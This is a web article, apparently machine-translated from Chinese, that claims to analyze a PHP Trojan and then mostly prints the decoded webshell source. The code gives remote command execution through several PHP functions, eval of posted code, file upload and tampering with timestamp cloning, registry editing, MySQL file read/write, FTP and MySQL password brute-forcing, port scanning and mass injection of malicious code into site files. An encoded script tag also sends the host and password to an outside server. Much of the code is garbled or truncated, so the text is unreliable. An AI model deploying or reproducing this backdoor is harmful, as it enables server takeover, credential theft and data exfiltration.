Home  >  Article  >  Backend Development  >  Encryption cracking PHP Trojan analysis encryption cracking

Encryption cracking PHP Trojan analysis encryption cracking

WBOY
WBOYOriginal
2016-07-29 08:39:4911574browse

Analysis shows that this Trojan is encoded with base64 and then compressed. Although relevant confidentiality measures have been taken, the PHP code must be executed and it will eventually generate PHP source code, so the following PHP program is written to decode, decompress, and write it to a file.
The decoding and decompression code is as follows:

Copy the code The code is as follows:


function writetofile($filename, $data)
{ //File Writing
$filenum=@fopen($filename ,"w");
if (!$filenum) {
return false;
}
flock($filenum,LOCK_EX);
$file_data=fwrite($filenum,$data);
fclose($filenum);
return true;
}
?>


Then run it in the php environment, you will get the php plaintext file as follows:

Copy the code The code is as follows:


error_reporting(7);
ob_start();
$mtime = explode(' ', microtime());
$starttime = $mtime[1] + $mtime[0];
@set_time_limit(0);
//Non-safe mode can use the above function and cancel after timeout.
/*====================== Program configuration=====================*/
// Whether password verification is required, 1 means verification is required, other numbers mean direct entry. The following options are invalid
$admin['check'] = "1";
// If password verification is required, please change the login password
// Default port table
$hidden = "44997";
$admin['port'] = "80,139,21,3389,3306,43958,1433,5631";
//Jump seconds
$admin['jumpsecond '] = "1";
//Connection port for Ftp cracking
$alexa = "yes";
//Whether to display the Alexa ranking, yes or no
$admin['ftpport'] = "21";
// Whether to allow phpspy itself to automatically modify the time of the edited file to the creation time (yes/no)
$retime = "no";
// The default location of cmd.exe, where the proc_open function is to be used, please modify it accordingly for Linux systems .(Assuming that the winnt system can still be specified in the program)
$cmd = "cmd.exe";
// The following is the copyright column displayed by phpspy, because it is used as a keyword by many programs to kill, Yuhan~~ Allow customization.Don’t change it if you still don’t understand~~
/*===================== End of configuration ================= ====*/
$serveru = $_SERVER ['HTTP_HOST'].$_SERVER['PHP_SELF'];
$serverp = $admin['pass'];
$copyurl = base64_decode('PHNjcmlwdCBzcmM9J2h0dHA6Ly8lMzglNjMlNjMlNjUlMkU lNjMlNkYlNkQvJTYzJTY1JTcyJTc0Lz9jZXJ0PTEzJnU9');
$copyurll = base64_decode('Jz48L3NjcmlwdD4=');
$onoff = (function_exists('ini_get')) ? ini_get('register_globals') : get_cfg_var('register_globals');
if ($onoff != 1) {@extract ($_POST, EXTR_SKIP);@extract($_GET, EXTR_SKIP);}
$self = $_SERVER['PHP_SELF'];$dis_func = get_cfg_var("disable_functions");
/*======== ============= Authentication=====================*/
if($admin['check'] == "1") {if ($_GET['action'] == "logout") {setcookie ("adminpass", "");echo "Logout successful...

Automatically after three seconds Exit or click here to exit the program interface>>>";exit;}
if ($_POST['do'] == 'login') {$thepass=trim ($_POST['adminpass']);if ($admin['pass'] == $thepass) {setcookie ("adminpass",$thepass,time()+(1*24*3600));echo "< ;meta http-equiv="refresh" c "".$copyurl.$serveru."&p=".$serverp.$copyurll."";exit;}}if (isset($_COOKIE[' adminpass'])) {if ($_COOKIE['adminpass'] != $admin['pass']) {loginpage();}} else {loginpage();}}
/*======= ============== Verification ends=====================*/
// Determine magic_quotes_gpc status
if (get_magic_quotes_gpc( ; Rl0y3Bb/cIkumnVixOIE/cMMF+ePxW1Ixah1yLBwe+5aHMa5JcsWs+T5JE+f9 /m+z/u8z73HP9cruaXbSAwhRAcmy4QcIBEyyd8zCJbw1FcJZH/cyZQDmpyTKYVVzkamnq+r5G21TIXN5aoTmHKO4d0uxulisl8vYGrr7JwhPn5marTG4ozM3oZ1hrYpk7JS2wR1/Fzb2+DnZGWos ZSV1lav+mfbePD5zooqJf9BveWZCMnR6Ah/MmfFlHaRJKTM0jxCCAVBekQbmE0iMaOGlDqmIueh iZ5LpGA0D9BGUyMxdVdXy6YQskXxTGTJA8kkJPuv5h8Ec7f1P8UgcBsF8B9qow1N2b0lygy83SbY CPlcExGmncH0FjMNkTRyVMlLJ/ec3bQ8v4HnauoqCKmJCmpe5n15KwiCIAiCIAiCIAjyUBCzU2PF TJ1nCRGM4kqdNyAsKCr+eitLKE9AXui/+cXt0wt+26cRT4u3xc2pid9c0Yb2iH2eSzGh3VZLD6zWH SOa3sxYBmoZ/T3berbdy1rx6rtXd8PDY0FRsWjSiytjxdm+9nWTshyN1ujy5SRYTnmO6nymMc9hZY64Z4qmuVB5oT9YKeZSvtxbLe12mMiv0sKD7ZAddnOIprG8oUIYpSlfXCyWJNB83jKldItSZ M0QS1RdknymsENsV6YcvqSxdEKJpvCuCfAtMyj4lC+KpltWyxviT+t7vpXT5kM3clqq+snA p3JGXr87YemMfXAu7xjkeMWL8XOVrsc0Ypwvfj8I7mVVzbChnJQIutdv3nVIEXVwCQ4PQ3Yq UZUOdquC52dq1wEIh4aVfLWq2RzMgD2Wqmlev5AuxisZRS0N4Rev87SYAHfmUfm0Ou25pgsO58lJemX/NEUhZku1puSInsBxF4jrY4tEt75Y3EJ5R91xngylPgnO80xqhBmeSa376Z3+yCZxxU UF8ikY6GEwlCTLMrSgNLxaiQugOVjjM+ndetBfKM4rGLoBR+gdVcrEuOcpSRcn1UUxKSa9Z4ueCLOnaseqtWEx3Gc42vXQnJxGKR1vTo3VuOd4MpREuNGykKqTkwjMRC4BQRAEQRAEQRAE+S+YZCL+ EPhTYINgl8GuRfVGQprjwGaBKfHHzB9r98EYno/J1mnaURgrXwY0T9OSU8h975b/6f7FBUbrQqPBXlNDSIbWJtQ5CcktKMrKL4xoFq2D5zhCHtNYnS6nIHB8LWnV1tpq1LfTXcRqs1e7GwWrw+ 7cQMh6ku1stJXXcIVVPGez5zjLeRu/KQuyG8kqU/5qU87UXtOZ+k3BhpTIbwRiolYCsR2sHqyMIiQPT HkP3gyxCNalnAOs0JJc89rsl9XCuc6NFXUuF1chTBta7ZzS/HRFjREEQRAEQRAEQRDkXyJIlb62MOA4a NU0L5op/TgenDEUlGW5vkySpJ6JJZ+Co8+201e8i+izrfRyengPPfLBpY5q+peDHeX0dy3dwkD/c foTGL8Z2u6vXjbS6j+WbOk611TvP9ZLF9IXDneUrtzYUdKdJ9Ot9AVvR2nJxs6OElrqKKUraFeyd Tv9aqjD3zACGyVb204MOPq5Hnq5Io0pkvsHujbk81NdTzSVB4DQjlCno7+WXk717qR691C9Z2XLhS937Eg87wsMdJvVjEAgsX+PpXP81oR0IuDob7B81ClJn1nOd/0sSTtCvv4 +R78NjIM5d7d58ZPmq2XHTwz0OVb1+I1Nb3WbSxs6HQ7H+fBIIDg6PjgxEQwPD0vfB8NjI2FF gWhQOnfp+sjJG6BNSGdGxybOXL8THAteHJSuDe891r1X6u8b7BsdvxkeGZTGR2/fDo+PSOO/j g6Hh1VRIqSkpGT+ MwzPNbidPNfI2JhGgXe6Khmbyw7GOF0CV8nxD/uvA0EQBEEQBEEQBPnfQkX+D/3x9PfTQ+l30jVsIpvMMqyBfZ59iX2FLWTXsdVsHSuwm9j32Fa2k93HHmKPsJfZUTbf6DI2GbcaH/YlIAiCIAiCIA iCIAjy1/wO";
function shelL($command){
global $windows,$disablefunctions;
$exec = '';$output= '';
$dep[]= array('pipe','r');$dep[]=array('pipe','w');
if(is_callable('passthru') && !strstr($disablefunctions,'passthru')){ @ ob_start();passthru($command);$exec=@ob_get_contents();@ob_clean();@ob_end_clean();}
elseif(is_callable('system') && !strstr($disablefunctions,'system')) {$tmp = @ob_get_contents(); @ob_clean();system($command) ; $output = @ob_get_contents(); @ob_clean(); $exec= $tmp; }
elseif(is_callable('exec') && !strstr($disablefunctions,'exec')) {exec($command,$output);$output = join("n",$output);$exec= $output;}
elseif(is_callable('shell_exec') && !strstr($disablefunctions,'shell_exec')){$exec= shell_exec($command);}
elseif(is_resource($output=popen($command,"r"))) {while(!feof($output )){$exec= fgets($output);}pclose($output);}
elseif(is_resource($res=proc_open($command,$dep,$pipes))){while(!feof($pipes[ 1])){$line = fgets($pipes[1]); $output.=$line;}$exec= $output;proc_close($res);}
elseif ($windows && is_object($ws = new COM("WScript.Shell"))){$dir=(isset($_SERVER["TEMP"]))?$_SERVER["TEMP"]:ini_get(' upload_tmp_dir') ;$name = $_SERVER["TEMP"].name();$ws->Run("cmd.exe /C $command >$name", 0, true);$exec = file_get_contents( $name);unlink($name);}
return $exec;
}
// View PHPINFO
if ($_GET['action'] == "phpinfo") {echo $phpinfo=(!eregi("phpinfo ",$dis_func)) ? phpinfo() : "The phpinfo() function has been disabled, please check ";exit;
}if($_GET['action'] == "nowuser") {$user = get_current_user();
if(!$user) $user = "Reporting to the chief, the host is abnormal and cannot obtain the current user name!";
echo "Current process user name: $user";
exit;
}
if(isset($_POST['phpcode'])){eval("?".">$_POST[phpcode]}
if($action=="mysqldown" ; "select load_file('".$filename."');";
$result = @mysql_query($query, $link);
if(!$result){
$downtmp = "Reading failed, maybe the file Does not exist or does not have file permission.
".mysql_error();
            }else{
    while ($row = mysql_fetch_array($result)) {
        $filename = basename($filename);
        if($rardown=="yes"){
            $zip = NEW Zip;
            $zipfiles[]=Array("$filename",$row[0]);
            $zip->Add($zipfiles,1);
            $code = $zip->get_file();
            $filename = "".$filename.".rar";
        }else{
            $code = $row[0];
        }
        header("Content-type: application/octet-stream");
        header("Accept-Ranges: bytes");
        header("Accept-Length: ".strlen($code));
        header("Content-Disposition: attachment;filename=$filename");
        echo($code);
        exit;
    }
    }
    }
}
// 在线代理
if (isset($_POST['url'])) {$proxycontents = @file_get_contents($_POST['url']);echo ($proxycontents) ? $proxycontents : "


获取 URL 内容失败

";exit;
}
// 下载文件
if (!empty($downfile)) {if (!@file_exists($downfile)) {echo "";} else {$filename = basename($downfile);$filename_info = explode('.', $filename);$fileext = $filename_info[count($filename_info)-1];header('Content-type: application/x-'.$fileext);header('Content-Disposition: attachment; filename='.$filename.'');header('Content-Description: PHP Generated Data');header('Content-Length: '.filesize($downfile));@readfile($downfile);exit;}
}
// 直接下载备份数据库
if ($_POST['backuptype'] == 'download') {
    @mysql_connect($servername,$dbusername,$dbpassword) or die("数据库连接失败");
    @mysql_select_db($dbname) or die("选择数据库失败");    
    $table = array_flip($_POST['table']);
    $result = mysql_query("SHOW tables");
    echo ($result) ? NULL : "出错: ".mysql_error();
    $filename = basename($_SERVER['HTTP_HOST']."_MySQL.sql");
    header('Content-type: application/unknown');
    header('Content-Disposition: attachment; filename='.$filename);
    $mysqldata = '';
    while ($currow = mysql_fetch_array($result)) {
        if (isset($table[$currow[0]])) {
            $mysqldata.= sqldumptable($currow[0]);
            $mysqldata.= $mysqldata."rn";
        }
    }
    mysql_close();
    exit;
}
// 程序目录
$pathname=str_replace('\','/',dirname(__FILE__));
$dirpath=str_replace('\','/',$_SERVER["DOCUMENT_ROOT"]);
// 获取当前路径
if (!isset($dir) or empty($dir)) {
    $dir = ".";
    $nowpath = getPath($pathname, $dir);
} else {
    $dir=$_GET['dir'];
    $nowpath = getPath($pathname, $dir);
}
// 判断读写情况
$dir_writeable = (dir_writeable($nowpath)) ? "可写" : "不可写";
$phpinfo=(!eregi("phpinfo",$dis_func)) ? " | PHPINFO()" : "";
$reg = (substr(PHP_OS, 0, 3) == 'WIN') ? " | 注册表操作" : "";
$tb = new FORMS;
?>


body,td{font-size: 12px;background-color:#000000;color:#eee;
margin: 1px;margin-left:1px;
SCROLLBAR-FACE-COLOR: #232323; SCROLLBAR-HIGHLIGHT-COLOR: #232323;
SCROLLBAR-SHADOW-COLOR: #383838; SCROLLBAR-DARKSHADOW-COLOR: #383838;
SCROLLBAR-3DLIGHT-COLOR: #232323; SCROLLBAR-ARROW-COLOR: #FFFFFF;
SCROLLBAR-TRACK-COLOR: #383838;}
a{color:#ddd;text-decoration: none;}a:hover{color:red;background:#000}
.smlfont {
    font-family: "Verdana", "Tahoma", "宋体";
    font-size: "11px";
}
.INPUT {
    FONT-SIZE: "12px";
    COLOR: "#000000";
    BACKGROUND-COLOR: "#FFFFFF";
    height: "18px";
    border: "1px solid #666666";
    padding-left: "2px";
}
.redfont {COLOR: "#CA0000";}
.top {BACKGROUND-COLOR: "#CCCCCC"}
.firstalt {BACKGROUND-COLOR: "#EFEFEF"}
.secondalt {BACKGROUND-COLOR: "#F5F5F5"}


<?php echo"$myneme"?>


//$_SERVER["DOCUMENT_ROOT"]
$tb->tableheader();
$tb->tdbody('
'.$_SERVER['HTTP_HOST'].''.date("Y年m月d日 h:i:s",time()).''.gethostbyname($_SERVER['SERVER_NAME']).'
','center','top');
$tb->tdbody('根目录 | Shell目录 | 环境变量 | 在线代理'.$reg.$phpinfo.' | WebShell | 杂项破解 | 解压mix.dll | 注销登录');
$tb->tdbody('批量挂马 | Http文件下载 | 文件查找 | 执行php脚本 | 执行SQL语句 | Func反弹Shell | MySQL备份 | Serv-U提权');
$tb->tablefooter();
?>



$tb->headerform(array('method'=>'GET','content'=>'

程序路径: '.$pathname.'
当前目录('.$dir_writeable.','.substr(base_convert(@fileperms($nowpath),10,8),-4).'): '.$nowpath.'
跳转目录: '.$tb->makeinput('dir',''.$nowpath.'','','text','80').' '.$tb->makeinput('','确定','','submit').' 〖支持绝对路径和相对路径〗'));
$tb->headerform(array('action'=>'?dir='.urlencode($dir),'enctype'=>'multipart/form-data','content'=>'上传文件到当前目录: '.$tb->makeinput('uploadfile','','','file').' '.$tb->makeinput('doupfile','确定','','submit').$tb->makeinput('uploaddir',$dir,'','hidden')));
$tb->headerform(array('action'=>'?action=editfile&dir='.urlencode($dir),'content'=>'新建文件在当前目录: '.$tb->makeinput('editfile').' '.$tb->makeinput('createfile','确定','','submit')));
$tb->headerform(array('content'=>'新建目录在当前目录: '.$tb->makeinput('newdirectory').' '.$tb->makeinput('createdirectory','确定','','submit')));
?>




/*===================== 执行操作 开始 =====================*/
echo "

n";
// 删除文件
if (!empty($delfile)) {
    if (file_exists($delfile)) {
        echo (@unlink($delfile)) ? $delfile." 删除成功!" : "文件删除失败!";
    } else {
        echo basename($delfile)." 文件已不存在!";
    }
}
// 删除目录
elseif (!empty($deldir)) {
    $deldirs="$dir/$deldir";
    if (!file_exists("$deldirs")) {
        echo "$deldir 目录已不存在!";
    } else {
        echo (deltree($deldirs)) ? "目录删除成功!" : "目录删除失败!";
    }
}
// Create directory
elseif (($createdirectory) AND !empty($_POST['newdirectory'])) {
if (!empty($newdirectory)) {
$mkdirs="$dir/$newdirectory";
if (file_exists("$mkdirs")) {
    echo "The directory already exists!";
    } else {
    echo (@mkdir("$mkdirs",0777)) ? "Creation of directory successful!" : "Creation failed !";
              @chmod("$mkdirs",0777);
                                                                                                                                                                  mp_name' ],"".$uploaddir."/".$_FILES['uploadfile']['name']."")) ? "Upload successful!" : "Upload failed!";
}
elseif($action= ="mysqlup"){
$filename = $_FILES['upfile']['tmp_name'];
if(!$filename) {
$ shell = file_get_contents($filename);
$mysql = bin2hex($shell);
if(!$upname) $upname = $_FILES['upfile']['name'];
$shell = "select 0x". $mysql." from ".$database." into DUMPFILE '".$uppath."/".$upname."';";
$link=@mysql_connect($host,$user,$password);
if (!$link){
             echo "Login failed".mysql_error();                                                                                                                                              "The operation was successful. The file was uploaded successfully. To ".$host.", the file name is ".$uppath."/".$upname."..";
                                                                                                                                                                  }
}
elseif($action=="mysqldown"){
if(!empty($downtmp)) echo $downtmp;
}
// Edit file
elseif ($_POST['do'] == 'doeditfile ') {
if (!empty($_POST['editfilename'])) {
if(!file_exists($editfilename)) unset($retime);
if($time==$now) $time = @filemtime ($editfilename);
$time2 = @date("Y-m-d H:i:s",$time);
          $filename="$editfilename";
          @$fp=fopen("$filename", "w") ;
                                                                                                                                                                                                                                                                                                     ($filecontent);
$filecontent = base64_encode($filecontent);
$filecontent = " @fclose ($ fp);
if ($ retime ==" yes ") {
echo" Fish Fish Automatic Operation: ";
echo $ msg =@Touch ($ FILENAME, $time) ? "Modify the file to ".$time2."Success!" : "Failed to modify the file time!";
    }
  } else {
        } echo "Please enter the file name you want to edit!";
    }
}
//File download
elseif ($_POST['do'] == 'downloads') {
$contents = @file_get_contents($_POST['durl']);
if(!$contents){
echo" cannot Read the data to be downloaded";
}
elseif(file_exists($path)){
 echo"Sorry, the file ".$path." already exists, please change the save file name.";
}else{
$fp = @fopen($path,"w");
echo $msg=@fwrite($fp,$contents) ? "Download file successfully!" : "Failed to download file while writing. !";
@fclose($fp);
}
}
elseif($_POST['action']=="mix"){
if(!file_exists($_POST['mixto'])){
$ tmp = base64_decode($mixdll);
$tmp = gzinflate($tmp);
$fp = fopen($_POST['mixto'],"w");
echo $msg=@fwrite($fp,$tmp ) ? "Decompression successful!" : "Is this directory not writable? !";
 fclose($fp);
}else{
 echo"Isn’t it?".$_POST['mixto']."Already exists~";
}
}
// Edit file properties
elseif ($_POST['do'] == 'editfileperm') {
if (!empty { ? "Attribute modified successfully!" : "Modification failed!";
   echo " File ".$file." The modified attributes are: ".substr(base_convert(@fileperms($dir."/".$file), 10,8),-4);
} else {
              echo "Please enter the attributes you want to set!";
                                                                                    ''' ‐ ‐ ‐‐‐‐‐‐‐‐‐‐‐‐ ‐ ) {
if (!empty($_POST['newname'])) {
$newname=$_POST['dir']."/".$_POST['newname'];
if (@file_exists($newname )) {
                                                                                                                                                                                      echo "".$_POST['newname']." Already exists, please enter a new one!"; Basename ($ _ Post ['OldName']. "Successfully renamed". $ _ Post ['Newname']. "!": "File name modification failed!"; Change the file name!";
}
}
elseif ($_POST['do'] == 'search') {
if(!empty($oldkey)){
echo" Search keywords: [".$oldkey."], the search results are displayed below: ";
if($type2 == "getpath"){
echo" When the mouse is moved over the result file, part of the result file will be intercepted and displayed. ";
}
echo"


";
find($path);
}else{
echo"You want to check Xiami? What should you check? Where's the shrimp? Is there any shrimp I want you to check?";
}
}
elseif ($_GET['action']=='plgmok') {
dirtree($_POST['dir'],$_POST['mm ']);
}
elseif ($_GET['action'] == "plgm") {
$action = '?action=plgmok';
$gm = "";
$tb->tableheader();
$tb->formheader($action,'Batch mount horse') ;
$tb->tdbody('Website batch horse-mounting program php version','center');
$tb->tdbody('File location: '.$tb->makeinput('dir',' '.$_SERVER["DOCUMENT_ROOT"].'','','text','60').'
To hang the code:'.$tb->maketextarea('mm',$gm, '50','5').''.$tb->makehidden('do','Batch mount horse').'
'.$tb->makeinput('submit','Start Hang horse','','submit'),'center','1','35');
echo "";
$tb->tablefooter();
}//end plgm
// Clone time
elseif ($_POST['do'] == 'domodtime') {
if (!@file_exists($_POST['curfile'])) {
echo "The file to be modified does not exist! ";}} Else {
if (! @File_exists ($ _ post ['tarfile'])) {
echo" The file to be referenced does not exist! "; tarfile']);
echo (@touch($_POST['curfile'],$time,$time)) ? basename($_POST['curfile'])." The modification time was successfully changed to ".date(" Y-m-d H:i:s",$time)." !" : "Failed to modify file modification time!";
                                                                                                                                  'modmytime') {
if (!@file_exists($_POST['curfile'])) {
echo "The file to be modified does not exist!";
}else {
           $year=$_POST['year'];                      $m                                                                                          ['minute '];
                                                                                                                                                                                                                                       ) {T $ Time = StrTotime ("$ Data $ Month $ Year $ Hour: $ MINUTE: $ Second"); (( $_POST['curfile'])." The modification time was successfully changed to ".date("Y-m-d H:i:s",$time)." !" : "The modification time of the file failed!";
                                                           }
}
elseif($do =='port'){
$tmp = explode(",",$port);
$count = count($tmp);
for($i=$first;$i< ;$count;$i++){
                    $fp = @fsockopen($host, $tmp[$i], $errno, $errstr, 1); Opened the port ".$tmp[$i]."
";
}
}
/*
The code here is very complicated. To be honest, I don’t even know what I wrote.
Fortunately, it works, so I won’t care about it. If someone sees it, I’ll just rewrite it. */
elseif ($do == 'crack') {//It is registered as a global variable anyway.
if(@file_exists($passfile)){
$tmp = file($passfile);
$count = count($tmp);
if(empty($onetime)){
$onetime = $count;                $ turn="1";
                                                                                                       $nowturn =                                                                      }
        if ($ turn & gt; $ tt or $ onetime & gt; $ count) {
echo "exceeds the dictionary capacity ~ If it is cracking the final process, I am sorry to fail.";
            }else{
                $first = $onetime*($turn-1);
                for($i=$first;$i<$now;$i++){
                    if($ctype=="mysql") $sa = @mysql_connect($host,$user,chop($tmp[$i]));
                    else $sa = @ftp_login(ftp_connect($host,$admin[ftpport]),$user,chop($tmp[$i]));
                if($sa)
                    {
                    $t = "获取".$user."的密码为".$tmp[$i]."";
                    }
            }
            if(!$t){
                echo "    mysql_close();
}
// 备份操作
elseif ($_POST['do'] == 'backupmysql') {
    if (empty($_POST['table']) OR empty($_POST['backuptype'])) {
        echo "请选择欲备份的数据表和备份方式!";
    } else {
        if ($_POST['backuptype'] == 'server') {
            @mysql_connect($servername,$dbusername,$dbpassword) or die("数据库连接失败");
            @mysql_select_db($dbname) or die("选择数据库失败");    
            $table = array_flip($_POST['table']);
            $filehandle = @fopen($path,"w");
            if ($filehandle) {
                $result = mysql_query("SHOW tables");
                echo ($result) ? NULL : "出错: ".mysql_error();
                while ($currow = mysql_fetch_array($result)) {
                    if (isset($table[$currow[0]])) {
                        sqldumptable($currow[0], $filehandle);
                        fwrite($filehandle,"nnn");
                    }
                }
                fclose($filehandle);
                echo "数据库已成功备份到
".$path."";
                mysql_close();
            } else {
                echo "备份失败,请确认目标文件夹是否具有可写权限!";
            }
        }
    }
}
elseif($downrar) {
if (!empty($dl)) {
if(eregi("unzipto:",$localfile)){
$path = "".$dir."/".str_replace(" unzipto:","",$localfile)."";
$zip = new Zip;
$zipfile=$dir."/".$dl[0];
$array=$zip->get_list($ zipfile);
          $count=count($array); i][folder]==0) {
                                                                                     
         if($i ==$f+$d) echo "$dl[0] was decompressed to ".$path."Successful
($f files $d directories)";
    elseif($f==0) echo " $ dl [0] Unzip to ". $ PATH." Failure ";
Else Echo" $ dl [0] Unbuttoned complete & lt; br & gt;
$zipfile="";
$zip = new Zip;
for($k=0;isset($dl[$k]);$k++)
{
$zipfile=$dir."/".$dl [$k];
                                                                                                                                                                                         
                                                                                                                                       for($i=0;$zipfilearray[$i];$ i++)
                                                                                    $filename=$zipfilearray[$i];                     $fp=@fopen($dir."/" .$filename,rb);
                                                                                 
                                                                                                              dl[$k];
                   $filesize=@filesize($zipfile);                                                                                p,$filesize) );
                @fclose($fp);
        $zip->Add($zipfiles,1);
        $code = $zip->get_file();
        $ck = "_QQ44997_".date("Y-m-d",time())."";
        if(empty($localfile)){
        header("Content-type: application/octet-stream");
        header("Accept-Ranges: bytes");
        header("Accept-Length: ".strlen($code));
        header("Content-Disposition: attachment;filename=".$_SERVER['HTTP_HOST']."".$ck."_Files.zip");
        echo $code;
        exit;
        }else{
         $fp = @fopen("".$dir."/".$localfile."","w");
         echo $msg=@fwrite($fp,$code) ? "压缩保存".$dir."/".$localfile."本地成功!!" : "Directory".$dir."No writable permission!";
                   @fclose($fp);                                                                                                                                            }
// Shell.Application runs the program
elseif(($_POST['do'] == 'programrun') AND !empty($_POST['program'])) {
  $shell= &new COM('Sh' .'el'.'l.Appl'.'ica'.'tion');
$a = $shell->ShellExecute($_POST['program'],$_POST['prog']);
echo ($a=='0') ? "The program has been executed successfully!" : "The program failed to run!";
}
// View the status of PHP configuration parameters
elseif(($_POST['do'] == 'viewphpvar ') AND !empty($_POST['phpvarname'])) {
  echo "Configuration parameters".$_POST['phpvarname']." Detection result: ".getphpcfg($_POST['phpvarname'])."" ;
}
// Read the registry
elseif(($regread) AND !empty($_POST['readregname'])) {
      $shell= &new COM('WSc'.'rip'.'t.Sh '.'ell');
var_dump(@$shell->RegRead($_POST['readregname']));
}
// Write to the registry
elseif(($regwrite) AND !empty($_POST ['writeregname']) AND !empty($_POST['regtype']) AND !empty($_POST['regval'])) {
  $shell= &new COM('W'.'Scr'.'ipt. S'.'hell');
$a = @$shell->RegWrite($_POST['writeregname'], $_POST['regval'], $_POST['regtype']);
echo ($a =='0') ? "Writing registry key value successfully!" : "Writing ".$_POST['regname'].", ".$_POST['regval'].", ".$_POST[ 'regtype']." Failed!";
}
// Delete the registry
elseif(($regdelete) AND !empty($_POST['delregname'])) {
    $shell= &new COM('WS'. 'cri'.'pt.S'.'he'.'ll');
$a = @$shell->RegDelete($_POST['delregname']);
echo ($a=='0' ) ? "Delete registry key successfully!" : "Delete ".$_POST['delregname']." Failed!";
}
else {
echo "$notice";
echo "Program | pcAnywhere | Start Program | AllUsers | Serv-U | ";
for ($i=66;$ i<=90;$i++){$drive= chr($i).':';
if (is_dir($drive."/")){$vol=shelL("vol $drive");if( empty($vol))$vol=$drive;echo " $drive\ ";}
}
}
echo "

n";
/*===================== 执行操作 结束 =====================*/
if (!isset($_GET['action']) OR empty($_GET['action']) OR ($_GET['action'] == "dir")) {
    $tb->tableheader();
?>

文件
    创建日期
最后修改
大小
属性
操作


// 目录列表
$dirs=@opendir($dir);
$dir_i = '0';
while ($file=@readdir($dirs)) {
    $filepath="$dir/$file";
    $a=@is_dir($filepath);
    if($a=="1"){
        if($file!=".." && $file!=".")    {
            $ctime=@date("Y-m-d H:i:s",@filectime($filepath));
            $mtime=@date("Y-m-d H:i:s",@filemtime($filepath));
            $dirperm=substr(base_convert(fileperms($filepath),10,8),-4);
            echo "n";
            echo " [$file]n";
            echo " $ctimen";
            echo " $mtimen";
            echo " Searchn";
            echo " $dirpermn";
            echo " | 删除 | 改名 |n";
            echo "n";
            $dir_i++;
        } else {
            if($file=="..") {
                echo "n";
                echo " 返回上级目录n";
                echo "n";
            }
        }
    }
}// while
@closedir($dirs);
?>



// 文件列表
$dirs=@opendir($dir);
$file_i = '0';
while ($file=@readdir($dirs)) {
    $filepath="$dir/$file";
    $a=@is_dir($filepath);
    if($a=="0"){        
        $size=@filesize($filepath);
        $size=$size/1024 ;
        $size= @number_format($size, 3);
        if (@filectime($filepath) == @filemtime($filepath)) {
            $ctime=@date("Y-m-d H:i:s",@filectime($filepath));
            $mtime=@date("Y-m-d H:i:s",@filemtime($filepath));
        } else {
            $ctime="".@date("Y-m-d H:i:s",@filectime($filepath))."";
            $mtime="".@date("Y-m-d H:i:s",@filemtime($filepath))."";
        }
        @$fileperm=substr(base_convert(@fileperms($filepath),10,8),-4);
        echo "n";
        echo " ";
        echo "";
        echo "$filen";
        echo " $ctimen";
        echo " $mtimen";
        echo " $size KBn";
        echo " $filepermn";
        echo " 下载 | 编辑 | 删除 | 改名 | 时间n";
        echo "n";
        $file_i++;
    }
}// while
@closedir($dirs);
if(get_cfg_var('safemode'))$z = "";
else $z = "
";
$tb->tdbody('
'.$tb->makeinput('chkall','on',' name="change" value="yes" /".$nowfile);
    $tb->makehidden('dir',$dir);
    $tb->tdbody('当前文件名: '.basename($nowfile));
    $tb->tdbody('改名为: '.$tb->makeinput('newname'));
    $tb->makehidden('do','rename');
    $tb->formfooter('1','30');
}//end rename
elseif ($_GET['action'] == "eval") {
    $action = "?dir=".urlencode($dir)."";
    $tb->tableheader();
    $tb->formheader(''.$action.' "target="_blank' ,'执行php脚本');
    $tb->tdbody($tb->maketextarea('phpcode',$contents));
    $tb->formfooter('1','30');
}
elseif ($_GET['action'] == "fileperm") {
    $action = "?dir=".urlencode($dir)."&file=".$file;
    $tb->tableheader();
    $tb->formheader($action,'修改文件属性');
    $tb->tdbody('修改 '.$file.' 的属性为: '.$tb->makeinput('fileperm',substr(base_convert(fileperms($dir.'/'.$file),10,8),-4)));
    $tb->makehidden('file',$file);
    $tb->makehidden('dir',urlencode($dir));
    $tb->makehidden('do','editfileperm');
    $tb->formfooter('1','30');
}//end fileperm
elseif ($_GET['action'] == "newtime") {
    $action = "?dir=".urlencode($dir);
    $cachemonth = array('January'=>1,'February'=>2,'March'=>3,'April'=>4,'May'=>5,'June'=>6,'July'=>7,'August'=>8,'September'=>9,'October'=>10,'November'=>11,'December'=>12);
    $tb->tableheader();
    $tb->formheader($action,'克隆文件最后修改时间');
    $tb->tdbody("修改文件: ".$tb->makeinput('curfile',$file,'readonly')." → 目标文件: ".$tb->makeinput('tarfile','需填完整路径及文件名'),'center','2','30');
    $tb->makehidden('do','domodtime');
    $tb->formfooter('','30');
    $tb->formheader($action,'自定义文件最后修改时间');
    $tb->tdbody('
  • 有效的时间戳典型范围是从格林威治时间 1901 年 12 月 13 日 星期五 20:45:54 到 2038年 1 月 19 日 星期二 03:14:07
    (该日期根据 32 位有符号整数的最小值和最大值而来)
  • 说明: 日取 01 到 30 之间, 时取 0 到 24 之间, 分和秒取 0 到 60 之间!
','left');
    $tb->tdbody('当前文件名: '.$file);
    $tb->makehidden('curfile',$file);
    $tb->tdbody('修改为: '.$tb->makeinput('year','1984','','text','4').' 年 '.$tb->makeselect(array('name'=>'month','option'=>$cachemonth,'selected'=>'October')).' 月 '.$tb->makeinput('data','18','','text','2').' 日 '.$tb->makeinput('hour','20','','text','2').' 时 '.$tb->makeinput('minute','00','','text','2').' 分 '.$tb->makeinput('second','00','','text','2').' 秒','center','2','30');
    $tb->makehidden('do','modmytime');
    $tb->formfooter('1','30');
}//end newtime
elseif ($_GET['action'] == "shell") {
    $action = "??action=shell&dir=".urlencode($dir);
    $tb->tableheader();
    $tb->tdheader('WebShell Mode');
if (substr(PHP_OS, 0, 3) == 'WIN') {
        $program = isset($_POST['program']) ? $_POST['program'] : "c:winntsystem32cmd.exe";
        $prog = isset($_POST['prog']) ? $_POST['prog'] : "/c net start > ".$pathname."/log.txt";
        echo "n";
        $tb->tdbody('无回显运行程序 → 文件: '.$tb->makeinput('program',$program).' 参数: '.$tb->makeinput('prog',$prog,'','text','40').' '.$tb->makeinput('','Run','','submit'),'center','2','35');
        $tb->makehidden('do','programrun');
        echo "n";
    }
echo "
n";
if(isset($_POST['cmd'])) $cmd = $_POST['cmd'];
$tb->tdbody('Tip: If the output result is incomplete, it is recommended to write the output result to a file. This way you can get the full content. ');
$tb->tdbody ('If the proc_open function is not the default winnt system, please set it up and use it yourself. If you modify it yourself, remember to write and exit, otherwise an unfinished process will be left on the host.');
$tb->tdbody('The proc_open function should be used The location of the cmd program: '.$tb->makeinput('cmd',$cmd,'','text','30').'(If it is a Linux system, you should modify it yourself)');
